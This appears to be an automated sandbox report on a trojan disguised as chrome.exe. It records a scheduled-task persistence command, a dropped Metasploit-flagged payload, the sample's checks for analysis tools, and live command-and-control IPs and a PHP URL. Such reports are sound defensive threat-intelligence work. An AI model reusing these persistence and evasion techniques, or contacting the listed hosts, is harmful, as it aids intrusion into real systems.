              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe "C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe"
              Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTaskJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe "C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe" Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTaskJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome.exe.logJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\rf2vtycg.4mnJump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winEXE@16/4@0/2
              Source: C:\Users\user\Desktop\chrome.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: chrome.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: chrome.exe, Type_8.csBase64 encoded string: 'pGK3kkOcyYdGAAPi/8G6N1XJe1C6K1NE48AddJAp9UpqE9ETf3AYgdAt7XPV9u0z'
              Source: chrome.exe, Type_7.csBase64 encoded string: 'gH+tHsKNvsbZ1EWhvkP3EI/4krTieZANT0IAF7dhi4rYvHth2WCRnUgs3pnZNNdzV+fF2DM4tXqFk8/R+sF11/V8uT2G+0Jglr9qFD7nWN3TcH2IdXXT5szSY8lpN/c5ERsM6YxPhnZV3qDkhjRx7r+lRv0Gd4haNDkFJkOp6Pg='
              Source: chrome.exe, Type_6.csBase64 encoded string: 'SFUUwksm21Jo5J+5xTj7msRAcfAo4qs7FQBZp/dECCssEyp3hstrrTA/CRzvoiV5'
              Source: chrome.exe, Type_1.csBase64 encoded string: '+q2Xl7nHs88OaG9hRih/Yn2TZXu+RlD9XOtERiaZ6keIAJhZrzZDwvY3CHI9ippP'
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_01
              Source: chrome.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: chrome.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: chrome.exeStatic file information: File size 1142288 > 1048576
              Source: chrome.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: chrome.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x113e00
              Source: chrome.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: chrome.exe, Type_8.cs.Net Code: Method_30 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
              Source: chrome.exe, Type_8.cs.Net Code: Method_30
              Source: C:\Users\user\Desktop\chrome.exeCode function: 0_2_00000271552D645E push rbp; iretd 0_2_00000271552D646E
              Source: C:\Users\user\Desktop\chrome.exeCode function: 0_2_00000271552D490B push FFFFFFF3h; iretd 0_2_00000271552D490D
              Source: C:\Users\user\Desktop\chrome.exeCode function: 0_2_00000271552D4308 push rdi; retn 00FFh0_2_00000271552D431C
              Source: C:\Users\user\Desktop\chrome.exeCode function: 0_2_00000271552D3E28 push rdi; ret 0_2_00000271552D3E29
              Source: C:\Users\user\Desktop\chrome.exeCode function: 6_2_000001F074243E28 push rdi; ret 6_2_000001F074243E29
              Source: C:\Users\user\Desktop\chrome.exeCode function: 6_2_000001F074244308 push rdi; retn 00FFh6_2_000001F07424431C
              Source: C:\Users\user\Desktop\chrome.exeCode function: 6_2_000001F07424490B push FFFFFFF3h; iretd 6_2_000001F07424490D
              Source: C:\Users\user\Desktop\chrome.exeCode function: 6_2_000001F07424645E push rbp; iretd 6_2_000001F07424646E
              Source: s1szwqo5.shl.exe.0.drStatic PE information: section name: .ftrs
              Source: initial sampleStatic PE information: section where entry point is pointing to: .ftrs
              Source: s1szwqo5.shl.exe.0.drStatic PE information: real checksum: 0xfb8c should be: 0xfd44
              Source: chrome.exeStatic PE information: real checksum: 0x0 should be: 0x11959b
              Source: initial sampleStatic PE information: section name: .text entropy: 7.939923426280949
              Source: C:\Users\user\Desktop\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
              Source: C:\Users\user\Desktop\chrome.exe TID: 3516Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\chrome.exe TID: 5848Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\chrome.exe TID: 7264Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\chrome.exe TID: 7068Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\chrome.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: chrome.exe, 00000006.00000002.584356100.000001F07450D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: s1szwqo5.shl.exe, 0000000A.00000002.811372775.000000000054B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
              Source: chrome.exe, 00000000.00000002.564760019.000002716F8B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvvtm
              Source: C:\Users\user\Desktop\chrome.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTaskJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe "C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe" Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTaskJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn WinTask /tr C:\Users\user\Desktop\chrome.exe /sc minute /mo 5Jump to behavior
              Source: C:\Users\user\Desktop\chrome.exeQueries volume information: C:\Users\user\Desktop\chrome.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeQueries volume information: C:\Users\user\Desktop\chrome.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\chrome.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procmon.exe
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tcpview.exe
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wireshark.exe
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lordpe.exe
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autoruns.exe
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ollydbg.exe
              Source: chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: regmon.exe

              Remote Access Functionality

              barindex
              Yara detected Metasploit Payload
              Source: Yara matchFile source: 0.2.chrome.exe.2715754b520.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe, type: DROPPED
              Source: Yara matchFile source: 0.2.chrome.exe.2715754b520.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.0.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.s1szwqo5.shl.exe.140000000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000002.811405642.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.563398385.0000027156F92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000000.562738521.0000000140004000.00000080.00000001.01000000.00000008.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping111
              Security Software Discovery              		Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
              Encrypted Channel              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Scheduled Task/Job              		1
              Disable or Modify Tools              		LSASS Memory21
              Virtualization/Sandbox Evasion              		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
              Ingress Tool Transfer              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)1
              Extra Window Memory Injection              		21
              Virtualization/Sandbox Evasion              		Security Account Manager1
              File and Directory Discovery              		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
              Process Injection              		NTDS12
              System Information Discovery              		Distributed Component Object ModelInput CaptureScheduled Transfer3
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
              Obfuscated Files or Information              		LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common11
              Software Packing              		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Extra Window Memory Injection              		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1270926 Sample: chrome.exe Startdate: 11/07/2023 Architecture: WINDOWS Score: 100 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 7 other signatures 2->48 7 chrome.exe 14 6 2->7         started        12 chrome.exe 4 2->12         started        process3 dnsIp4 38 128.199.113.162, 49690, 49692, 80 DIGITALOCEAN-ASNUS United Kingdom 7->38 34 C:\Users\user\AppData\...\s1szwqo5.shl.exe, PE32+ 7->34 dropped 36 C:\Users\user\AppData\...\chrome.exe.log, CSV 7->36 dropped 50 Uses schtasks.exe or at.exe to add and modify task schedules 7->50 14 s1szwqo5.shl.exe 7->14         started        18 schtasks.exe 1 7->18         started        20 schtasks.exe 1 7->20         started        22 schtasks.exe 1 12->22         started        24 schtasks.exe 1 12->24         started        file5 signatures6 process7 dnsIp8 40 104.248.194.233, 443, 49691 DIGITALOCEAN-ASNUS United States 14->40 52 Antivirus detection for dropped file 14->52 54 Machine Learning detection for dropped file 14->54 26 conhost.exe 18->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              chrome.exe63%ReversingLabsByteCode-MSIL.Trojan.Leonem
              chrome.exe65%VirustotalBrowse
              chrome.exe100%AviraHEUR/AGEN.1313362
              chrome.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe100%AviraTR/Crypt.XPACK.Gen7
              C:\Users\user\AppData\Local\Temp\s1szwqo5.shl.exe100%Joe Sandbox ML

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://128.199H0%Avira URL Cloudsafe
              http://128.199.113.162100%Avira URL Cloudmalware
              http://128.199.113.16212%VirustotalBrowse
              http://128.199.113.162x0%Avira URL Cloudsafe
              http://128.199.113.162/upwawsfrg.php?zd=1100%Avira URL Cloudmalware
              http://128.199.113.162/upwawsfrg.php100%Avira URL Cloudmalware
              http://128.199.113.162/upwawsfrg.php14%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://128.199.113.162/upwawsfrg.php?zd=1false
              • Avira URL Cloud: malware
              		unknown
              http://128.199.113.162/upwawsfrg.phpfalse
              • 14%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://128.199Hchrome.exe, 00000000.00000002.563398385.000002715726C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namechrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://128.199.113.162xchrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://128.199.113.162chrome.exe, 00000000.00000002.563398385.0000027156F41000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.563398385.0000027157252000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.577366091.000001F000001000.00000004.00000800.00020000.00000000.sdmpfalse
                • 12%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                128.199.113.162
                		unknownUnited Kingdom
                		14061DIGITALOCEAN-ASNUSfalse
                104.248.194.233
                		unknownUnited States
                		14061DIGITALOCEAN-ASNUStrue

                General Information

                Joe Sandbox Version:38.0.0 Beryl
                Analysis ID:1270926
                Start date and time:2023-07-11 15:46:11 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 27s
                Hypervisor based Inspection enabled:false
